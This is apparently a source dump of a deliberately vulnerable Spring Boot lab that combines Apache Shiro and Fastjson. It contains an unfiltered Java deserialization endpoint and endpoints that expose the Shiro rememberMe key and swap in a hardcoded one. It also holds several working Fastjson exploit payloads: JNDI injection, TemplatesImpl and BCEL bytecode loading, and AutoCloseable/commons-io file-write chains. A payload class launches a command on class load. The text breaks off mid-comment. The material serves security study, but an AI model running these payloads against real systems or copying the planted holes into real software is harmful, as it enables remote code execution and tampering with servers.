11 | jar
12 | com.shiro.vuln
13 | ShiroAndFastJson
14 | 0.0.1-SNAPSHOT
15 | ShiroAndFastJson
16 | Demo project for Spring Boot
17 |
18 | 1.8
19 |
20 |
21 |
22 |
23 | com.alibaba
24 | fastjson
25 | 1.2.68
26 |
27 |
28 |
29 | org.springframework.boot
30 | spring-boot-starter-web
31 |
32 |
33 |
34 | org.springframework.boot
35 | spring-boot-starter-test
36 | test
37 |
38 |
39 |
40 | org.apache.shiro
41 | shiro-core
42 | 1.2.4
43 |
44 |
45 | org.apache.shiro
46 | shiro-web
47 | 1.6.0
48 |
49 |
50 | org.apache.shiro
51 | shiro-spring
52 | 1.6.0
53 |
54 |
55 |
56 | commons-collections
57 | commons-collections
58 | 3.2.1
59 |
60 |
61 | org.apache.commons
62 | commons-collections4
63 | 4.0
64 |
65 |
66 | com.mchange
67 | c3p0
68 | 0.9.5.2
69 |
70 |
71 | org.javassist
72 | javassist
73 | 3.25.0-GA
74 | test
75 |
76 |
77 |
78 |
79 |
80 | org.apache.tomcat
81 | tomcat-dbcp
82 | 7.0.47
83 |
84 |
85 |
86 |
87 | commons-io
88 | commons-io
89 | 2.2
90 |
91 |
92 |
93 |
94 | mysql
95 | mysql-connector-java
96 | 8.0.19
97 |
98 |
99 |
100 |
101 | org.aspectj
102 | aspectjtools
103 | 1.9.6
104 |
105 |
106 |
107 |
108 | com.mchange
109 | mchange-commons-java
110 | 0.2.11
111 |
112 |
113 |
114 |
115 | com.zaxxer
116 | HikariCP
117 | 3.2.0
118 |
119 |
120 |
121 |
122 | io.lettuce
123 | lettuce-core
124 | 5.1.6.RELEASE
125 |
126 |
127 |
128 | org.postgresql
129 | postgresql
130 | 42.3.1
131 |
132 |
133 |
134 |
135 | org.rhq
136 | rhq-scripting-python
137 | 4.13.0
138 |
139 |
140 |
141 |
142 | org.codehaus.groovy
143 | groovy
144 | 2.4.12
145 |
146 |
147 |
148 | commons-codec
149 | commons-codec
150 | 1.6
151 |
152 |
153 |
154 |
155 | ognl
156 | ognl
157 | 3.2.21
158 |
159 |
160 |
161 | xalan
162 | xalan
163 | 2.7.2
164 |
165 |
166 |
167 |
168 | org.dom4j
169 | dom4j
170 | 2.1.3
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
184 |
185 |
186 |
187 |
188 |
189 |
190 | src/main/java
191 |
192 | **/*.*
193 |
194 |
195 |
196 | src/main/resources
197 |
198 | **/*.*
199 |
200 |
201 |
202 |
203 |
204 | org.springframework.boot
205 | spring-boot-maven-plugin
206 |
207 |
208 |
209 |
210 |
211 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/ShiroAndFastJsonApplication.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln;
2 |
3 | import org.springframework.boot.SpringApplication;
4 | import org.springframework.boot.autoconfigure.SpringBootApplication;
5 | import org.springframework.boot.web.servlet.ServletComponentScan;
6 |
@SpringBootApplication
// @ServletComponentScan stays disabled, so @WebFilter/@WebServlet-annotated classes
// (if any exist under the filter package) are not auto-registered from here.
//@ServletComponentScan
public class ShiroAndFastJsonApplication {

    /**
     * Boots the Spring context for the Shiro + fastjson lab application.
     *
     * @param args command-line arguments handed through to Spring Boot unchanged
     */
    public static void main(String[] args) {
        Class<?> primarySource = ShiroAndFastJsonApplication.class;
        SpringApplication.run(primarySource, args);
    }

}
16 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/controller/IndexController.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.controller;
2 |
3 |
4 | import com.alibaba.fastjson.JSON;
5 | import com.alibaba.fastjson.JSONObject;
6 |
7 |
8 | import com.shiro.vuln.filter.MemBehinderFilter;
9 | import org.apache.shiro.mgt.RememberMeManager;
10 | import org.apache.shiro.web.mgt.CookieRememberMeManager;
11 | import org.springframework.stereotype.Controller;
12 | import org.springframework.web.bind.annotation.PostMapping;
13 | import org.springframework.web.bind.annotation.RequestBody;
14 | import org.springframework.web.bind.annotation.RequestMapping;
15 | import org.springframework.web.bind.annotation.ResponseBody;
16 |
17 | import java.nio.charset.StandardCharsets;
18 | import java.util.Base64;
19 | import java.util.Map;
20 |
21 | @Controller
22 | public class IndexController {
23 |
24 |
/**
 * Liveness-style endpoint: logs that a request arrived and answers {@code "hello"}.
 * Mapped for every HTTP method because {@code @RequestMapping} carries no method restriction.
 *
 * @return the constant body {@code "hello"}
 */
@RequestMapping("/index")
@ResponseBody
public String index() {
    final String reply = "hello";
    System.out.println("index收到请求-------");
    return reply;
}
31 |
32 |
/**
 * Returns, Base64-encoded, the cipher key of a <em>freshly constructed</em>
 * {@link CookieRememberMeManager} — not the key of the bean actually serving requests.
 * The value is whatever the constructor of the shiro-core version on the classpath installs
 * (pom.xml pins shiro-core 1.2.4, whose constructor default is a fixed, well-known key;
 * later versions generate one per instance). The two coincide only when the wired bean
 * keeps that default. Reachable by any HTTP method; whether Shiro protects this route is
 * decided in ShiroConfig, which is not shown here.
 *
 * @return Base64 text of the 16-byte AES key, in the platform default charset
 */
@RequestMapping("/getKey")
@ResponseBody
public String getKey() {
    CookieRememberMeManager freshManager = new CookieRememberMeManager();
    Base64.Encoder encoder = Base64.getEncoder();
    byte[] encoded = encoder.encode(freshManager.getCipherKey());
    return new String(encoded);
}
39 |
40 |
/**
 * Replaces the AES key of the <em>running</em> Shiro RememberMeManager with the fixed value
 * decoded from the literal below, so that rememberMe cookies are thereafter protected by a
 * key that is static and present in this source — the weakened configuration this lab sets
 * up. No Spring/Shiro API is used: the manager is reached from the current Tomcat worker
 * thread through private fields made accessible by reflection
 * (TaskThread → contextClassLoader → resources → context → filterConfigs → "shiroFilter"
 * → filter → securityManager → rememberMeManager), then both setter methods are invoked.
 * Reachable by any HTTP method; whether the route is protected is decided in ShiroConfig
 * (not shown here).
 *
 * @return {@code "ok"} when the chain completed, {@code "fail"} (stack trace on stdout)
 *     when any cast, field lookup or invocation threw — including the case where the
 *     thread is not a Tomcat TaskThread or a different Tomcat/Shiro layout renames a field
 */
@RequestMapping("/setKey")
@ResponseBody
public String setKey() {

    try {
        // Hard-coded 16-byte key; everything below installs it into the live manager.
        byte[] key = Base64.getDecoder().decode("2AvVhdsgUs0FSA3SDFAdag==");

        // Field names from here on are Tomcat internals (TaskThread, the webapp class loader,
        // StandardContext) and are tied to the Tomcat version bundled by Spring Boot.
        org.apache.tomcat.util.threads.TaskThread thread = (org.apache.tomcat.util.threads.TaskThread) Thread.currentThread();
        java.lang.reflect.Field field = thread.getClass().getSuperclass().getDeclaredField("contextClassLoader");
        field.setAccessible(true);
        Object obj = field.get(thread);
        field = obj.getClass().getSuperclass().getSuperclass().getDeclaredField("resources");
        field.setAccessible(true);
        obj = field.get(obj);
        field = obj.getClass().getDeclaredField("context");
        field.setAccessible(true);
        obj = field.get(obj);
        field = obj.getClass().getSuperclass().getDeclaredField("filterConfigs");
        field.setAccessible(true);
        obj = field.get(obj);
        // filterConfigs: filter name → filter config object of the current web application.
        java.util.HashMap objMap = (java.util.HashMap) obj;
        java.util.Iterator entries = objMap.entrySet().iterator();
        while (entries.hasNext()) {
            java.util.Map.Entry entry = (Map.Entry) entries.next();
            // The filter must be registered under exactly this name; otherwise nothing is changed
            // and "ok" is still returned.
            if (entry.getKey().equals("shiroFilter")) {
                obj = entry.getValue();
                field = obj.getClass().getDeclaredField("filter");
                field.setAccessible(true);
                obj = field.get(obj);
                field = obj.getClass().getSuperclass().getDeclaredField("securityManager");
                field.setAccessible(true);
                obj = field.get(obj);
                field = obj.getClass().getSuperclass().getDeclaredField("rememberMeManager");
                field.setAccessible(true);
                obj = field.get(obj);
                // Both setters live on the manager's superclass (AbstractRememberMeManager);
                // encryption and decryption keys are set to the same value.
                java.lang.reflect.Method setEncryptionCipherKey = obj.getClass().getSuperclass().getDeclaredMethod("setEncryptionCipherKey", new Class[]{byte[].class});
                setEncryptionCipherKey.invoke(obj, new Object[]{key});
                java.lang.reflect.Method setDecryptionCipherKey = obj.getClass().getSuperclass().getDeclaredMethod("setDecryptionCipherKey", new Class[]{byte[].class});
                setDecryptionCipherKey.invoke(obj, new Object[]{key});

            }
        }
    } catch (Exception e) {
        e.printStackTrace();
        return "fail";
    }
    return "ok";
}
89 |
90 | @RequestMapping("/init")
91 | @ResponseBody
92 | public String init() throws Exception {
93 | //new MemBehinder3(Thread.currentThread().getContextClassLoader());
94 | //new MemBehinderFilter(Thread.currentThread().getContextClassLoader())
95 | return "init";
96 | }
97 |
98 | @RequestMapping("hello")
99 | public String hello(){
100 | return "hello";
101 | }
102 |
103 | @PostMapping("/json")
104 | @ResponseBody
105 | public JSONObject parse(@RequestBody String data) {
106 | JSONObject jsonObject = new JSONObject();
107 | jsonObject.put("status", 0);
108 | //ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
109 | //com.sun.org.apache.bcel.internal.util.ClassLoader;
110 | // com.sun.org.apache.bcel.internal.util.ClassPath
111 |
112 | // java.awt.Point
113 |
114 | JSON.parse(data);
115 | //JSON.parseObject(data);
116 | return jsonObject;
117 | }
118 | }
119 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/controller/SerController.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.controller;
2 |
3 |
4 | import org.springframework.stereotype.Controller;
5 | import org.springframework.web.bind.annotation.RequestMapping;
6 | import org.springframework.web.bind.annotation.ResponseBody;
7 |
8 | import java.io.ByteArrayInputStream;
9 | import java.io.IOException;
10 | import java.io.ObjectInputStream;
11 | import java.util.Base64;
12 |
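@Controller
public class SerController {

    /**
     * Native Java deserialization sink for the lab.
     *
     * SECURITY (intentional): the Base64 body of {@code str} goes straight into
     * {@link ObjectInputStream#readObject()} with no {@code ObjectInputFilter}, so
     * any gadget chain on the classpath runs with the server's privileges, and
     * {@code toString()} is then invoked on the result as a second trigger. This
     * is what the serialized payloads target and must never be reproduced in real
     * code (use a typed format, or at minimum an allow-list filter before
     * readObject).
     *
     * @param str Base64-encoded Java serialization stream; absent means no-op
     * @return "ok" when nothing was supplied or deserialization completed,
     *         "error" when decoding or deserialization threw
     */
    @RequestMapping("/ser")
    @ResponseBody
    public String ser(String str) {
        if (str == null) {
            return "ok";
        }
        // try-with-resources: the original never closed the stream
        try (ObjectInputStream in = new ObjectInputStream(
                new ByteArrayInputStream(Base64.getDecoder().decode(str)))) {
            Object o = in.readObject();
            // gadget trigger: toString() may itself run attacker-controlled logic
            o.toString();
        } catch (Exception e) {
            e.printStackTrace();
            return "error";
        }
        return "ok";
    }
}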
35 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/controller/UserController.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.controller;
2 |
3 | import org.apache.shiro.SecurityUtils;
4 | import org.apache.shiro.authc.AuthenticationException;
5 | import org.apache.shiro.authc.AuthenticationToken;
6 | import org.apache.shiro.authc.UsernamePasswordToken;
7 | import org.apache.shiro.subject.Subject;
8 | import org.springframework.stereotype.Controller;
9 | import org.springframework.web.bind.annotation.PostMapping;
10 | import org.springframework.web.bind.annotation.RequestMapping;
11 | import org.springframework.web.bind.annotation.RequestParam;
12 | import org.springframework.web.bind.annotation.ResponseBody;
13 |
@Controller
public class UserController {

    /**
     * Shiro form login. Builds a UsernamePasswordToken from the posted fields (the
     * rememberMe flag is set only when the "rememberme" field is exactly
     * "remember-me"), forwards to "/" on success and back to "/login" when Shiro
     * rejects the credentials. A rememberMe login is the normal way Shiro gets to
     * issue the encrypted rememberMe cookie whose key IndexController exposes and
     * replaces.
     *
     * @param username   posted user name
     * @param password   posted clear-text password
     * @param rememberMe "remember-me" to request a rememberMe cookie; defaults to ""
     * @return a forward view name: "forward:/" or "forward:/login"
     */
    @PostMapping("/doLogin")
    public String doLoginPage(@RequestParam("username") String username, @RequestParam("password") String password, @RequestParam(name="rememberme", defaultValue="") String rememberMe){
        final boolean wantsRememberMe = rememberMe.equals("remember-me");
        final UsernamePasswordToken token = new UsernamePasswordToken(username, password, wantsRememberMe);
        final Subject currentUser = SecurityUtils.getSubject();
        try {
            currentUser.login(token);
        } catch (AuthenticationException rejected) {
            return "forward:/login";
        }
        return "forward:/";
    }

    /** Landing body after login: the literal "hello". */
    @ResponseBody
    @RequestMapping(value={"/"})
    public String helloPage() {
        return "hello";
    }

    /** Body served for unauthorised access: the literal "error". */
    @ResponseBody
    @RequestMapping(value={"/unauth"})
    public String errorPage() {
        return "error";
    }

    /** Login "page": a plain-text hint pointing at POST /doLogin. */
    @ResponseBody
    @RequestMapping(value={"/login"})
    public String loginPage() {
        return "please login pattern /doLogin";
    }

}
50 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Calc.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import java.io.*;
4 |
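/**
 * Gadget payload class: merely loading it runs {@code cmd.exe /c calc} from the
 * static initializer, so getting the class defined (e.g. via the TemplatesImpl or
 * BCEL class-loader chains in Fastjson02/Fastjson03) is the proof of execution.
 * The captured child output is rethrown as an Exception so it travels back in
 * whatever error the loader surfaces. Windows-only: elsewhere the exec fails with
 * IOException, which the static block prints and swallows so class loading still
 * succeeds.
 */
public class Calc {
    static {
        try {
            main(null);
        } catch (Exception e) {
            // swallowed on purpose: a failed trigger must not abort class initialisation
            e.printStackTrace();
        }
    }

    /**
     * Launches calc through cmd.exe, collects whatever the child prints, and
     * always throws an Exception carrying that text.
     *
     * @param args ignored
     * @throws Exception always: IOException if the process cannot start, otherwise
     *         an Exception whose message is the captured output
     */
    public static void main(String[] args) throws Exception {
        // argv form; equals the whitespace tokenisation Runtime.exec("cmd.exe /c calc") did
        Process process = new ProcessBuilder("cmd.exe", "/c", "calc").start();
        StringBuilder sb = new StringBuilder();
        // try-with-resources closes the pipe the original left open
        try (BufferedReader br = new BufferedReader(new InputStreamReader(process.getInputStream()))) {
            String line;
            while ((line = br.readLine()) != null) {
                sb.append(line).append("\n");
            }
        }
        String str = sb.toString();
        System.out.println(str);
        throw new Exception(str);
    }

}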
29 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson01_JNDI.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 | import com.alibaba.fastjson.JSON;
3 |
/**
 * Fastjson <= 1.2.24 JNDI injection PoC: a {@code com.sun.rowset.JdbcRowSetImpl}
 * with an attacker-controlled {@code dataSourceName}; the {@code autoCommit}
 * setter triggers connect(), which performs the JNDI lookup against
 * {@code rmi://127.0.0.1:1099/Object}. Needs a malicious RMI/LDAP server listening
 * there, and a JDK whose remote-codebase restrictions are off for the lookup to
 * actually load code.
 */
public class Fastjson01_JNDI {
    public static void main(String[] args) throws Exception {
        // <= 1.2.24: a bare @type is honoured with no autoType check at all
        String payload = String.join("\r\n",
                "{",
                " \"a\": {",
                " \"@type\": \"com.sun.rowset.JdbcRowSetImpl\", ",
                " \"dataSourceName\": \"rmi://127.0.0.1:1099/Object\", ",
                " \"autoCommit\": true",
                " }",
                "}");
        // < 1.2.48: same gadget behind the java.lang.Class/"val" cache-poisoning bypass
        // payload = "{\r\n"
        // + " \"a\": {\r\n"
        // + " \"@type\": \"java.lang.Class\", \r\n"
        // + " \"val\": \"com.sun.rowset.JdbcRowSetImpl\"\r\n"
        // + " }, \r\n"
        // + " \"b\": {\r\n"
        // + " \"@type\": \"com.sun.rowset.JdbcRowSetImpl\", \r\n"
        // + " \"dataSourceName\": \"rmi://127.0.0.1:1099/Object\", \r\n"
        // + " \"autoCommit\": true\r\n"
        // + " }\r\n"
        // + "}";
        System.out.println(payload);
        JSON.parse(payload);
    }
}
30 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson02_TemplatesImpl.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 | import java.io.*;
3 | import com.alibaba.fastjson.JSON;
4 | import com.alibaba.fastjson.parser.Feature;
5 | import java.util.Base64;
6 |
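/**
 * Fastjson <= 1.2.24 TemplatesImpl code-execution PoC.
 *
 * The bytes of the sibling class {@code TemplatesImplcmd.class} go into
 * {@code _bytecodes}; {@code _name} and {@code _tfactory} must be non-null for the
 * translet to be defined, and the {@code _outputProperties} entry drives the getter
 * that instantiates it, which runs the class's static initializer. All of these
 * fields are private, hence {@link Feature#SupportNonPublicField} on the parse
 * call; without that feature the payload is inert.
 */
public class Fastjson02_TemplatesImpl {
    public static void main(String[] args) throws Exception {
        byte[] bs = readClassBytes("TemplatesImplcmd.class");
        String encodedBytes = Base64.getEncoder().encodeToString(bs);
        // <= 1.2.24: plain @type
        String payload = "{\r\n"
                + " \"a\": {\r\n"
                + " \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", \r\n"
                + " \"_bytecodes\": [\r\n"
                + " \""+encodedBytes+"\"\r\n"
                + " ], \r\n"
                + " \"_name\": \"aaa\", \r\n"
                + " \"_tfactory\": { }, \r\n"
                + " \"_outputProperties\": { }\r\n"
                + " }\r\n"
                + "}";
        // < 1.2.48: same gadget behind the java.lang.Class/"val" cache-poisoning bypass
        // payload = "{\r\n"
        // + " \"a\": {\r\n"
        // + " \"@type\": \"java.lang.Class\", \r\n"
        // + " \"val\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"\r\n"
        // + " }, \r\n"
        // + " \"b\": {\r\n"
        // + " \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\", \r\n"
        // + " \"_bytecodes\": [\r\n"
        // + " \""+encodedBytes+"\"\r\n"
        // + " ], \r\n"
        // + " \"_name\": \"aaa\", \r\n"
        // + " \"_tfactory\": { }, \r\n"
        // + " \"_outputProperties\": { }\r\n"
        // + " }\r\n"
        // + "}";
        System.out.println(payload);
        JSON.parseObject(payload, Feature.SupportNonPublicField);

    }

    /**
     * Reads a sibling class resource completely and closes it.
     *
     * The original used {@code available()} plus a single {@code read()}, which is
     * only a size hint and may return a short buffer, and never closed the stream;
     * a truncated class file would make the translet definition fail inside the
     * parser with no obvious cause.
     *
     * @param name resource name relative to this class
     * @return the full resource bytes
     * @throws IOException if the resource is missing or cannot be read
     */
    private static byte[] readClassBytes(String name) throws IOException {
        try (InputStream in = Fastjson02_TemplatesImpl.class.getResourceAsStream(name)) {
            if (in == null) {
                throw new FileNotFoundException(name + " not found next to " + Fastjson02_TemplatesImpl.class.getName());
            }
            ByteArrayOutputStream out = new ByteArrayOutputStream();
            byte[] buf = new byte[8192];
            int n;
            while ((n = in.read(buf)) != -1) {
                out.write(buf, 0, n);
            }
            return out.toByteArray();
        }
    }
}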
46 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson03_Becl.java:
--------------------------------------------------------------------------------
1 | //package com.shiro.vuln.fastjson;
2 | //import java.io.FileInputStream;
3 | //import java.io.InputStream;
4 | //
5 | //import com.sun.org.apache.bcel.internal.classfile.Utility;
6 | //import com.alibaba.fastjson.JSON;
7 | //
8 | //public class Fastjson03_Becl {
9 | // public static void main(String[] args) throws Exception {
10 | // //<=1.2.24 and tomcat-dbcp 7
11 | // InputStream resourceAsStream = Fastjson02_TemplatesImpl.class.getResourceAsStream("Calc.class");
12 | // byte[] bs = new byte[resourceAsStream.available()];
13 | // resourceAsStream.read(bs);
14 | // String code = "$$BCEL$$"+Utility.encode(bs,true);
15 | // String payload = "{\r\n"
16 | // + " {\r\n"
17 | // + " \"aaa\": {\r\n"
18 | // + " \"@type\": \"org.apache.tomcat.dbcp.dbcp.BasicDataSource\", \r\n"
19 | // + " \"driverClassLoader\": {\r\n"
20 | // + " \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\r\n"
21 | // + " }, \r\n"
22 | // + " \"driverClassName\": \""+code+"\"\r\n"
23 | // + " }\r\n"
24 | // + " }:\"bbb\"\r\n"
25 | // + "}";
26 | // //<1.2.48
27 | //// payload = "{\r\n"
28 | //// + " {\r\n"
29 | //// + " \"a\": {\r\n"
30 | //// + " \"@type\": \"java.lang.Class\",\r\n"
31 | //// + " \"val\": \"org.apache.tomcat.dbcp.dbcp.BasicDataSource\"\r\n"
32 | //// + " },\r\n"
33 | //// + " \"b\": {\r\n"
34 | //// + " \"@type\": \"java.lang.Class\",\r\n"
35 | //// + " \"val\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\r\n"
36 | //// + " },\r\n"
37 | //// + " \"c\": {\r\n"
38 | //// + " \"@type\": \"org.apache.tomcat.dbcp.dbcp.BasicDataSource\",\r\n"
39 | //// + " \"driverClassLoader\": {\r\n"
40 | //// + " \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\r\n"
41 | //// + " },\r\n"
42 | //// + " \"driverClassName\": \""+code+"\"\r\n"
43 | //// + " }\r\n"
44 | //// + " }:\"bbb\"\r\n"
45 | //// + "}";
46 | // System.out.println(payload);
47 | // JSON.parseObject(payload);
48 | // //new ClassLoader().loadClass(code).newInstance();
49 | // }
50 | //
51 | //}
52 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson04_JDK11.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.util.Arrays;
import java.util.Base64;
import java.util.zip.DataFormatException;
import java.util.zip.Deflater;
import java.util.zip.Inflater;

import com.alibaba.fastjson.JSON;
10 |
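/**
 * Fastjson <= 1.2.68 file-write PoC that needs no third-party gadget: the
 * "expected class" bypass (first {@code @type} names the allow-listed interface
 * {@code java.lang.AutoCloseable}, the second any implementor) builds a
 * {@code sun.rmi.server.MarshalOutputStream} over an {@code InflaterOutputStream}
 * over a {@code FileOutputStream("1.txt")}; the inflater input is the deflated
 * content, so the decompressed text lands in {@code 1.txt} in the working
 * directory. The JDK 11 variant passes the inflater input as an object because
 * the field's type changed between JDK 8/10 and 11 (see the commented variant).
 */
public class Fastjson04_JDK11 {
    public static void main(String[] args) throws Exception {
        String code = gzcompress("qwer");
        //php -r "echo base64_encode(gzcompress('RMB122 is here'));"
        //<=1.2.68 and JDK11
        String payload = "{\r\n"
                + " \"@type\":\"java.lang.AutoCloseable\",\r\n"
                + " \"@type\":\"sun.rmi.server.MarshalOutputStream\",\r\n"
                + " \"out\":\r\n"
                + " {\r\n"
                + " \"@type\":\"java.util.zip.InflaterOutputStream\",\r\n"
                + " \"out\":\r\n"
                + " {\r\n"
                + " \"@type\":\"java.io.FileOutputStream\",\r\n"
                + " \"file\":\"1.txt\",\r\n"
                + " \"append\":false\r\n"
                + " },\r\n"
                + " \"infl\":\r\n"
                + " {\r\n"
                + " \"input\":\r\n"
                + " {\r\n"
                + " \"array\":\""+code+"\",\r\n"
                + " \"limit\":22\r\n"
                + " }\r\n"
                + " },\r\n"
                + " \"bufLen\":1048576\r\n"
                + " },\r\n"
                + " \"protocolVersion\":1\r\n"
                + "}\r\n"
                + "";
        //JDK8/10
        // payload = "{\r\n"
        // + " '@type':\"java.lang.AutoCloseable\",\r\n"
        // + " '@type':'sun.rmi.server.MarshalOutputStream',\r\n"
        // + " 'out':\r\n"
        // + " {\r\n"
        // + " '@type':'java.util.zip.InflaterOutputStream',\r\n"
        // + " 'out':\r\n"
        // + " {\r\n"
        // + " '@type':'java.io.FileOutputStream',\r\n"
        // + " 'file':'1.txt',\r\n"
        // + " 'append':false\r\n"
        // + " },\r\n"
        // + " 'infl':\r\n"
        // + " {\r\n"
        // + " 'input':'"+code+"'\r\n"
        // + " },\r\n"
        // + " 'bufLen':1048576\r\n"
        // + " },\r\n"
        // + " 'protocolVersion':1\r\n"
        // + "}\r\n"
        // + "";

        System.out.println(payload);
        JSON.parse(payload);
    }

    /**
     * zlib-compresses {@code code} (UTF-8) and returns the result Base64-encoded,
     * i.e. the same shape as PHP's {@code base64_encode(gzcompress(...))}. The raw
     * compressed bytes are also printed, as before.
     *
     * The original caught every exception and silently fell back to returning the
     * uncompressed bytes, which would embed garbage in the payload; Deflater throws
     * nothing checked, so no catch is needed and the native buffer is released in
     * finally.
     *
     * @param code text to compress
     * @return Base64 of the zlib stream
     */
    public static String gzcompress(String code) {
        byte[] data = code.getBytes(StandardCharsets.UTF_8);
        Deflater compresser = new Deflater();
        try {
            compresser.setInput(data);
            compresser.finish();
            ByteArrayOutputStream bos = new ByteArrayOutputStream(data.length);
            byte[] buf = new byte[1024];
            while (!compresser.finished()) {
                bos.write(buf, 0, compresser.deflate(buf));
            }
            byte[] output = bos.toByteArray();
            System.out.println(Arrays.toString(output));
            return Base64.getEncoder().encodeToString(output);
        } finally {
            compresser.end(); // releases native zlib memory even if deflate failed
        }
    }

    /**
     * Inverse of {@link #gzcompress(String)}: Base64-decodes and inflates.
     *
     * The original looped forever on a truncated stream (inflate keeps returning 0
     * with needsInput() set and finished() never true) and returned a partial
     * string on a corrupt one; both now fail loudly.
     *
     * @param code Base64 of a zlib stream
     * @return the decompressed text (UTF-8)
     * @throws IllegalArgumentException if the input is not valid Base64, is
     *         truncated, needs a preset dictionary, or is corrupt
     */
    public static String gzuncompress(String code) {
        byte[] data = Base64.getDecoder().decode(code);
        Inflater decompresser = new Inflater();
        try {
            decompresser.setInput(data);
            ByteArrayOutputStream o = new ByteArrayOutputStream(data.length);
            byte[] buf = new byte[1024];
            while (!decompresser.finished()) {
                int i = decompresser.inflate(buf);
                if (i == 0 && (decompresser.needsInput() || decompresser.needsDictionary())) {
                    throw new IllegalArgumentException("truncated or dictionary-requiring deflate stream");
                }
                o.write(buf, 0, i);
            }
            return new String(o.toByteArray(), StandardCharsets.UTF_8);
        } catch (DataFormatException e) {
            throw new IllegalArgumentException("corrupt deflate stream", e);
        } finally {
            decompresser.end();
        }
    }
}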
123 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson05_io_write_1.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
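/**
 * Fastjson <= 1.2.68 + commons-io 2.0-2.6 arbitrary file write.
 *
 * Source: {@code ReaderInputStream(CharSequenceReader(content))}. Sink:
 * {@code WriterOutputStream(FileWriterWithEncoding("1.txt"))}. A
 * {@code TeeInputStream} copies every byte read from the source into the sink,
 * and constructing an {@code XmlStreamReader} over the tee performs the read
 * (encoding sniffing), which is the trigger. {@code $ref} reuses the same source
 * and sink objects across three triggers so more data is pulled through. The
 * {@code {"@type":"java.lang.String""..."}} form (no comma) is a parser quirk
 * that yields a plain String where an object is expected.
 */
public class Fastjson05_io_write_1 {
    public static void main(String[] args) throws Exception {
        //<=1.2.68 and commons-io-2.0-2.6
        // Pad the content past 8 KiB: the intermediate buffers default to 8192 bytes
        // and the data only reaches the file once they spill, so a short string is
        // never written. Built in one step instead of 8200 string concatenations.
        String code = "qaxnb" + new String(new char[8200]).replace('\0', 'a');
        // body of each trigger; identical for trigger, trigger2 and trigger3
        String trigger = " \"@type\":\"java.lang.AutoCloseable\",\r\n"
                + " \"@type\":\"org.apache.commons.io.input.XmlStreamReader\",\r\n"
                + " \"is\":{\r\n"
                + " \"@type\":\"org.apache.commons.io.input.TeeInputStream\",\r\n"
                + " \"input\":{\r\n"
                + " \"$ref\":\"$.input\"\r\n"
                + " },\r\n"
                + " \"branch\":{\r\n"
                + " \"$ref\":\"$.branch\"\r\n"
                + " },\r\n"
                + " \"closeBranch\": true\r\n"
                + " },\r\n"
                + " \"httpContentType\":\"text/xml\",\r\n"
                + " \"lenient\":false,\r\n"
                + " \"defaultEncoding\":\"UTF-8\"\r\n";
        String payload = "{\r\n"
                + " \"x\":{\r\n"
                + " \"@type\":\"com.alibaba.fastjson.JSONObject\",\r\n"
                + " \"input\":{\r\n"
                + " \"@type\":\"java.lang.AutoCloseable\",\r\n"
                + " \"@type\":\"org.apache.commons.io.input.ReaderInputStream\",\r\n"
                + " \"reader\":{\r\n"
                + " \"@type\":\"org.apache.commons.io.input.CharSequenceReader\",\r\n"
                + " \"charSequence\":{\"@type\":\"java.lang.String\"\""+code+"\"\r\n"
                + " },\r\n"
                + " \"charsetName\":\"UTF-8\",\r\n"
                + " \"bufferSize\":1024\r\n"
                + " },\r\n"
                + " \"branch\":{\r\n"
                + " \"@type\":\"java.lang.AutoCloseable\",\r\n"
                + " \"@type\":\"org.apache.commons.io.output.WriterOutputStream\",\r\n"
                + " \"writer\":{\r\n"
                + " \"@type\":\"org.apache.commons.io.output.FileWriterWithEncoding\",\r\n"
                + " \"file\":\"1.txt\",\r\n"
                + " \"encoding\":\"UTF-8\",\r\n"
                + " \"append\": false\r\n"
                + " },\r\n"
                + " \"charsetName\":\"UTF-8\",\r\n"
                + " \"bufferSize\": 1024,\r\n"
                + " \"writeImmediately\": true\r\n"
                + " },\r\n"
                + " \"trigger\":{\r\n"
                + trigger
                + " },\r\n"
                + " \"trigger2\":{\r\n"
                + trigger
                + " },\r\n"
                + " \"trigger3\":{\r\n"
                + trigger
                + " }\r\n"
                + " }\r\n"
                + "}\r\n"
                + "";
        System.out.println(payload);
        JSON.parse(payload);
    }
}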
96 |
--------------------------------------------------------------------------------
/src/main/java/com/shiro/vuln/fastjson/Fastjson06_io_write_2.java:
--------------------------------------------------------------------------------
1 | package com.shiro.vuln.fastjson;
2 |
3 | import com.alibaba.fastjson.JSON;
4 |
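/**
 * Fastjson <= 1.2.68 + commons-io 2.7/2.8 arbitrary file write: the same chain as
 * Fastjson05 (CharSequenceReader -> ReaderInputStream -> TeeInputStream ->
 * WriterOutputStream -> FileWriterWithEncoding, triggered by XmlStreamReader
 * construction) adapted to the field names these commons-io versions use:
 * {@code inputStream} instead of {@code is}, {@code charsetName} instead of
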